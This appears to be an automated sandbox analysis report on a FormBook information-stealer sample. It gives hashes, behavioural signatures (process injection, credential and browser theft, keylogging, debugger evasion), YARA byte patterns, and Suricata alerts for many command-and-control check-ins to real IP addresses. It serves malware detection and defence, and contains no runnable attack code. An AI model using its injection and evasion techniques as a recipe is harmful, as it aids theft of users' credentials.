
Windows Analysis Report
Z6s208B9QX.exe

Overview

General Information

Sample name: Z6s208B9QX.exe (renamed because the original name is a hash value)
Original sample name: e24039b0b5c049807d966f0215f595410392fd4bc65142f101dc3282b6f75aa5.exe
Analysis ID: 1529061
MD5: 09bfd7f979770cde56456734d6d1ff8d
SHA1: 15a1450424a5bf0320b429d7aaa71dc724502d89
SHA256: e24039b0b5c049807d966f0215f595410392fd4bc65142f101dc3282b6f75aa5
Tags: exe, Formbook, user-adrian__luca

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • Z6s208B9QX.exe (PID: 3604 cmdline: "C:\Users\user\Desktop\Z6s208B9QX.exe" MD5: 09BFD7F979770CDE56456734D6D1FF8D)
    • svchost.exe (PID: 632 cmdline: "C:\Users\user\Desktop\Z6s208B9QX.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • UCAmCgWJyh.exe (PID: 416 cmdline: "C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • write.exe (PID: 1568 cmdline: "C:\Windows\SysWOW64\write.exe" MD5: 3D6FDBA2878656FA9ECB81F6ECE45703)
          • UCAmCgWJyh.exe (PID: 3000 cmdline: "C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 2692 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
0000000B.00000002.3738831581.0000000000530000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000B.00000002.3738831581.0000000000530000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2bdc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13f6f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000008.00000002.1730607904.0000000003690000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000008.00000002.1730607904.0000000003690000.00000040.10000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2bdc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13f6f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000008.00000002.1730238566.0000000000400000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
(9 further memory-dump entries are not shown in this extract)

Source | Rule | Description | Author | Strings
8.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
8.2.svchost.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2e2c3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16472:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
8.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
8.2.svchost.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2f0c3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x17272:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Users\user\Desktop\Z6s208B9QX.exe", CommandLine: "C:\Users\user\Desktop\Z6s208B9QX.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Z6s208B9QX.exe", ParentImage: C:\Users\user\Desktop\Z6s208B9QX.exe, ParentProcessId: 3604, ParentProcessName: Z6s208B9QX.exe, ProcessCommandLine: "C:\Users\user\Desktop\Z6s208B9QX.exe", ProcessId: 632, ProcessName: svchost.exe
Source: Process started | Author: vburov | Data: Command: "C:\Users\user\Desktop\Z6s208B9QX.exe", CommandLine: "C:\Users\user\Desktop\Z6s208B9QX.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Z6s208B9QX.exe", ParentImage: C:\Users\user\Desktop\Z6s208B9QX.exe, ParentProcessId: 3604, ParentProcessName: Z6s208B9QX.exe, ProcessCommandLine: "C:\Users\user\Desktop\Z6s208B9QX.exe", ProcessId: 632, ProcessName: svchost.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-08T15:54:55.058220+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.11 | 49981 | 3.33.130.190 | 80 | TCP
2024-10-08T15:55:19.067831+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.11 | 49985 | 23.224.37.76 | 80 | TCP
2024-10-08T15:55:33.552417+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.11 | 49989 | 20.184.53.162 | 80 | TCP
2024-10-08T15:55:47.945936+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.11 | 49993 | 199.192.21.169 | 80 | TCP
2024-10-08T15:56:01.506046+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.11 | 49997 | 81.2.196.19 | 80 | TCP
2024-10-08T15:56:15.481765+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.11 | 50001 | 107.163.130.249 | 80 | TCP
2024-10-08T15:56:38.340684+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.11 | 50005 | 103.21.221.4 | 80 | TCP
2024-10-08T15:56:51.500642+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.11 | 50009 | 3.33.130.190 | 80 | TCP
2024-10-08T15:57:04.975729+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.11 | 50013 | 3.33.130.190 | 80 | TCP
2024-10-08T15:57:18.137011+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.11 | 50017 | 15.197.204.56 | 80 | TCP
2024-10-08T15:57:31.437191+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.11 | 50021 | 198.252.106.191 | 80 | TCP
2024-10-08T15:58:06.365310+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.11 | 50025 | 43.154.104.247 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-08T15:55:11.208615+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 49982 | 23.224.37.76 | 80 | TCP
2024-10-08T15:55:13.745510+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 49983 | 23.224.37.76 | 80 | TCP
2024-10-08T15:55:16.324503+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 49984 | 23.224.37.76 | 80 | TCP
2024-10-08T15:55:25.356025+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 49986 | 20.184.53.162 | 80 | TCP
2024-10-08T15:55:27.907328+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 49987 | 20.184.53.162 | 80 | TCP
2024-10-08T15:55:31.024077+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 49988 | 20.184.53.162 | 80 | TCP
2024-10-08T15:55:39.615131+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 49990 | 199.192.21.169 | 80 | TCP
2024-10-08T15:55:42.829677+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 49991 | 199.192.21.169 | 80 | TCP
2024-10-08T15:55:45.444662+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 49992 | 199.192.21.169 | 80 | TCP
2024-10-08T15:55:53.697059+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 49994 | 81.2.196.19 | 80 | TCP
2024-10-08T15:55:56.268746+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 49995 | 81.2.196.19 | 80 | TCP
2024-10-08T15:55:58.941631+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 49996 | 81.2.196.19 | 80 | TCP
2024-10-08T15:56:07.828208+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 49998 | 107.163.130.249 | 80 | TCP
2024-10-08T15:56:10.342789+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 49999 | 107.163.130.249 | 80 | TCP
2024-10-08T15:56:13.128271+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 50000 | 107.163.130.249 | 80 | TCP
2024-10-08T15:56:30.980849+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 50002 | 103.21.221.4 | 80 | TCP
2024-10-08T15:56:33.258500+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 50003 | 103.21.221.4 | 80 | TCP
2024-10-08T15:56:35.789412+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 50004 | 103.21.221.4 | 80 | TCP
2024-10-08T15:56:44.908726+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 50006 | 3.33.130.190 | 80 | TCP
2024-10-08T15:56:46.407490+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 50007 | 3.33.130.190 | 80 | TCP
2024-10-08T15:56:48.996607+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 50008 | 3.33.130.190 | 80 | TCP
2024-10-08T15:56:57.025799+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 50010 | 3.33.130.190 | 80 | TCP
2024-10-08T15:57:00.480822+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 50011 | 3.33.130.190 | 80 | TCP
2024-10-08T15:57:02.113014+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 50012 | 3.33.130.190 | 80 | TCP
2024-10-08T15:57:10.496832+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 50014 | 15.197.204.56 | 80 | TCP
2024-10-08T15:57:13.035316+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 50015 | 15.197.204.56 | 80 | TCP
2024-10-08T15:57:15.596242+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 50016 | 15.197.204.56 | 80 | TCP
2024-10-08T15:57:23.793559+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 50018 | 198.252.106.191 | 80 | TCP
2024-10-08T15:57:26.356859+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 50019 | 198.252.106.191 | 80 | TCP
2024-10-08T15:57:28.949746+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 50020 | 198.252.106.191 | 80 | TCP
2024-10-08T15:57:38.673484+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 50022 | 43.154.104.247 | 80 | TCP
2024-10-08T15:57:41.219310+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 50023 | 43.154.104.247 | 80 | TCP
2024-10-08T15:57:43.938046+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 50024 | 43.154.104.247 | 80 | TCP


AV Detection

Source: Z6s208B9QX.exe | ReversingLabs: Detection: 71%
Source: Yara match | File source: 8.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000B.00000002.3738831581.0000000000530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.1730607904.0000000003690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.1730238566.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.3743731307.0000000002A60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.3742814788.0000000002A00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.1730979134.0000000003B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.3746307677.0000000002FC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: Z6s208B9QX.exe | Joe Sandbox ML: detected
Source: Z6s208B9QX.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: write.pdbGCTL | source: svchost.exe, 00000008.00000002.1730455622.0000000003019000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1730439402.0000000003000000.00000004.00000020.00020000.00000000.sdmp, UCAmCgWJyh.exe, 0000000A.00000002.3744246000.0000000001328000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: write.pdb | source: svchost.exe, 00000008.00000002.1730455622.0000000003019000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1730439402.0000000003000000.00000004.00000020.00020000.00000000.sdmp, UCAmCgWJyh.exe, 0000000A.00000002.3744246000.0000000001328000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb | source: UCAmCgWJyh.exe, 0000000A.00000000.1650413823.0000000000B3E000.00000002.00000001.01000000.00000005.sdmp, UCAmCgWJyh.exe, 0000000D.00000000.1799667591.0000000000B3E000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: wntdll.pdbUGP | source: Z6s208B9QX.exe, 00000000.00000003.1278966873.0000000004980000.00000004.00001000.00020000.00000000.sdmp, Z6s208B9QX.exe, 00000000.00000003.1282094374.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1730639128.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1631846240.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1730639128.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1633513336.0000000003500000.00000004.00000020.00020000.00000000.sdmp, write.exe, 0000000B.00000002.3746720068.0000000004710000.00000040.00001000.00020000.00000000.sdmp, write.exe, 0000000B.00000003.1732839764.000000000456A000.00000004.00000020.00020000.00000000.sdmp, write.exe, 0000000B.00000003.1730478415.00000000043B1000.00000004.00000020.00020000.00000000.sdmp, write.exe, 0000000B.00000002.3746720068.00000000048AE000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: Z6s208B9QX.exe, 00000000.00000003.1278966873.0000000004980000.00000004.00001000.00020000.00000000.sdmp, Z6s208B9QX.exe, 00000000.00000003.1282094374.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1730639128.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1631846240.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1730639128.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1633513336.0000000003500000.00000004.00000020.00020000.00000000.sdmp, write.exe, 0000000B.00000002.3746720068.0000000004710000.00000040.00001000.00020000.00000000.sdmp, write.exe, 0000000B.00000003.1732839764.000000000456A000.00000004.00000020.00020000.00000000.sdmp, write.exe, 0000000B.00000003.1730478415.00000000043B1000.00000004.00000020.00020000.00000000.sdmp, write.exe, 0000000B.00000002.3746720068.00000000048AE000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: svchost.pdb | source: write.exe, 0000000B.00000002.3747327536.0000000004D3C000.00000004.10000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.3743884868.0000000002B25000.00000004.00000020.00020000.00000000.sdmp, UCAmCgWJyh.exe, 0000000D.00000002.3746863202.0000000002AFC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000011.00000002.2023697745.000000004000C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP | source: write.exe, 0000000B.00000002.3747327536.0000000004D3C000.00000004.10000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.3743884868.0000000002B25000.00000004.00000020.00020000.00000000.sdmp, UCAmCgWJyh.exe, 0000000D.00000002.3746863202.0000000002AFC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000011.00000002.2023697745.000000004000C000.00000004.80000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\Z6s208B9QX.exe | Code function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose, | 0_2_00452492
Source: C:\Users\user\Desktop\Z6s208B9QX.exe | Code function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, | 0_2_00442886
Source: C:\Users\user\Desktop\Z6s208B9QX.exe | Code function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, | 0_2_004788BD
Source: C:\Users\user\Desktop\Z6s208B9QX.exe | Code function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose, | 0_2_004339B6
Source: C:\Users\user\Desktop\Z6s208B9QX.exe | Code function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose, | 0_2_0045CAFA
Source: C:\Users\user\Desktop\Z6s208B9QX.exe | Code function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, | 0_2_00431A86
Source: C:\Users\user\Desktop\Z6s208B9QX.exe | Code function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose, | 0_2_0044BD27
Source: C:\Users\user\Desktop\Z6s208B9QX.exe | Code function: 0_2_0045DE8F FindFirstFileW,FindClose, | 0_2_0045DE8F
Source: C:\Users\user\Desktop\Z6s208B9QX.exe | Code function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose, | 0_2_0044BF8B
Source: C:\Windows\SysWOW64\write.exe | Code function: 11_2_0054C340 FindFirstFileW,FindNextFileW,FindClose, | 11_2_0054C340
Source: C:\Windows\SysWOW64\write.exe | Code function: 4x nop then xor eax, eax | 11_2_00539A60
Source: C:\Windows\SysWOW64\write.exe | Code function: 4x nop then pop edi | 11_2_0053DF50
Source: C:\Windows\SysWOW64\write.exe | Code function: 4x nop then mov ebx, 00000004h | 11_2_045604E8

Networking

Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:49993 -> 199.192.21.169:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:49997 -> 81.2.196.19:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:50001 -> 107.163.130.249:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49992 -> 199.192.21.169:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:49981 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49995 -> 81.2.196.19:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50003 -> 103.21.221.4:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49983 -> 23.224.37.76:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:50005 -> 103.21.221.4:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:49985 -> 23.224.37.76:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50024 -> 43.154.104.247:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50016 -> 15.197.204.56:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:50021 -> 198.252.106.191:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49984 -> 23.224.37.76:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49988 -> 20.184.53.162:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50020 -> 198.252.106.191:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50014 -> 15.197.204.56:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50015 -> 15.197.204.56:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49991 -> 199.192.21.169:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50000 -> 107.163.130.249:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:50013 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:50025 -> 43.154.104.247:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:50017 -> 15.197.204.56:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49990 -> 199.192.21.169:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50022 -> 43.154.104.247:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49986 -> 20.184.53.162:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49998 -> 107.163.130.249:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50002 -> 103.21.221.4:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50006 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50019 -> 198.252.106.191:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50012 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50004 -> 103.21.221.4:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50018 -> 198.252.106.191:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50023 -> 43.154.104.247:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49982 -> 23.224.37.76:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49996 -> 81.2.196.19:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50008 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:50009 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:49989 -> 20.184.53.162:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49999 -> 107.163.130.249:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49987 -> 20.184.53.162:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50007 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50010 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:50011 -> 3.33.130.190:80
